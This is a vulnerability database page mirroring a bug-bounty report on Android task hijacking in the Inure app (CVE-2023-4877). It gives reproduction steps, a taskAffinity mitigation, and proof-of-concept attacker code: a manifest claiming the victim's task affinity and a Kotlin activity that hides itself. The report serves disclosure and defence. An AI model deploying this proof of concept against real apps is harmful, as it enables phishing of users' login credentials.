Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrM0ck3d168E9299-F8FF-40D6-9DEF-D097B38BAD84
HistoryAug 20, 2023 - 7:39 p.m.

Android Manifest Misconfiguration Leading to Task Hijacking

2023-08-2019:39:00
m0ck3d
www.huntr.dev
59
task hijacking
malicious app
android 11
permissions
vulnerability
mitigation
manifest
attack code
bug bounty

EPSS

0.001

Percentile

49.2%

JSON

Description

Task hijacking allows malicious apps to inherit permissions of vulnerable apps and is usually used for phishing login credentials of victims.
This vulnerability applies to all Android versions before Android 11.

Steps To Reproduce:

  1. Victim installs malicious app
  2. Victim starts malicious app (could also be a background service)
  3. Victim opens legitimate app (Inure app) which the malicious app can intercept.

Video Proof of Concept

Video POC

Mitigation

To prevent this attack you will need to set taskAffinity property of the application activities to taskAffinity= “” in the <activity> tag of
the AndroidManifest.xml to force the activities to use a randomly generated task affinity, or set it at the <application> tag to enforce on all activities in the application.

Attacker App Code

Android Manifest

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.m0ck3d.taskhijackingattackapp"
    tools:ignore="ExtraText"&gt;

    &lt;application
        android:allowBackup="true"
        android:icon="@drawable/daverage"
        android:label="AttackAppTaskHijacking"
        android:roundIcon="@drawable/daverage"
        android:supportsRtl="true"
        android:theme="@style/Theme.Taskhijackingattackapp"
        android:taskAffinity="app.simple.inure"&gt;
        &lt;activity
            android:name=".MainActivity"  android:launchMode="singleTask" android:excludeFromRecents="true"
            android:exported="true"&gt;
            &lt;intent-filter&gt;
                &lt;action android:name="android.intent.action.MAIN" /&gt;

                &lt;category android:name="android.intent.category.LAUNCHER" /&gt;
            &lt;/intent-filter&gt;
        &lt;/activity&gt;
    &lt;/application&gt;

&lt;/manifest&gt;

Main Activity

import android.os.Bundle
import android.content.Intent;
import androidx.appcompat.app.AppCompatActivity


class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        moveTaskToBack(true);
    }
    override fun onResume() {
        super.onResume()
        setContentView(R.layout.activity_main)
    }
}

Related

osv 1
nvd 1
cve 1
prion 1
cvelist 1
vulnrichment 1
osv
osv
CVE-2023-4877
2023-09-10 01:15:08
nvd
nvd
CVE-2023-4877
2023-09-10 01:15:08
cve
cve
CVE-2023-4877
2023-09-10 01:15:08
prion
prion
Hardcoded credentials
2023-09-10 01:15:00
cvelist
cvelist
CVE-2023-4877 Exposure of Sensitive Information to an Unauthorized Actor in hamza417/inure
2023-09-10 00:00:42
vulnrichment
vulnrichment
CVE-2023-4877 Exposure of Sensitive Information to an Unauthorized Actor in hamza417/inure
2023-09-10 00:00:42

EPSS

0.001

Percentile

49.2%

JSON
Related for 168E9299-F8FF-40D6-9DEF-D097B38BAD84
osv1nvd1cve1prion1cvelist1vulnrichment1